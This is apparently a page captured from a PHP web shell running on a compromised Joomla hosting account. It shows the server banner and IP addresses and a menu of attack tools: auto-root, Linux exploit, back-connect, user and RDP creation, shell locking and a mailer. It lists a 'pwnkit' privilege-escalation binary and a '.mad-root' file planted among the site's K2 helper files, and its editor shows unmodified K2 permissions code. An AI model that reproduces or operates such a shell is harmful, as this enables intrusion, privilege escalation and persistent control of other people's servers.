Linux webm002.cluster120.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.120.20.2 | : 216.73.216.49
Cant Read [ /etc/named.conf ]
8.5.7
verseaumee
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
verseaumee /
www /
components /
com_k2 /
helpers /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-r--r--
permissions.j16.php
2.57
KB
-rw----r--
permissions.php
12.24
KB
-rw----r--
pwnkit
0
B
-rwxr-xr-x
route.php
8.31
KB
-rw----r--
utilities.php
11.4
KB
-rw----r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : permissions.j16.php
<?php /** * @version 2.7.x * @package K2 * @author JoomlaWorks http://www.joomlaworks.net * @copyright Copyright (c) 2006 - 2016 JoomlaWorks Ltd. All rights reserved. * @license GNU/GPL license: http://www.gnu.org/copyleft/gpl.html */ // no direct access defined('_JEXEC') or die; jimport('joomla.html.parameter'); class K2HelperPermissions { public static function checkPermissions() { // Set some variables $mainframe = JFactory::getApplication(); $user = JFactory::getUser(); $option = JRequest::getCmd('option'); $view = JRequest::getCmd('view'); $task = JRequest::getCmd('task'); $id = ($task == 'apply' || $task == 'save') ? JRequest::getInt('id') : JRequest::getVar('cid'); //Generic manage check if (!$user->authorise('core.manage', $option)) { JError::raiseWarning(404, JText::_('JERROR_ALERTNOAUTHOR')); $mainframe->redirect('index.php'); } // Determine action for rest checks $action = false; if ($mainframe->isAdmin() && $view != '' && $view != 'info') { switch($task) { case '' : case 'save' : case 'apply' : if (!$id) { $action = 'core.create'; } else { $action = 'core.edit'; } break; case 'trash' : case 'remove' : $action = 'core.delete'; break; case 'publish' : case 'unpublish' : case 'featured': $action = 'core.edit.state'; } // Edit or Edit own action if ($action == 'core.edit' && $view == 'item' && $id) { JTable::addIncludePath(JPATH_COMPONENT_ADMINISTRATOR.DS.'tables'); $item = JTable::getInstance('K2Item', 'Table'); $item->load($id); if ($item->created_by == $user->id) { $action = 'core.edit.own'; } } // Check the determined action if ($action) { if (!$user->authorise($action, $option)) { JError::raiseWarning(404, JText::_('JERROR_ALERTNOAUTHOR')); $mainframe->redirect('index.php?option=com_k2'); } } } } }
Close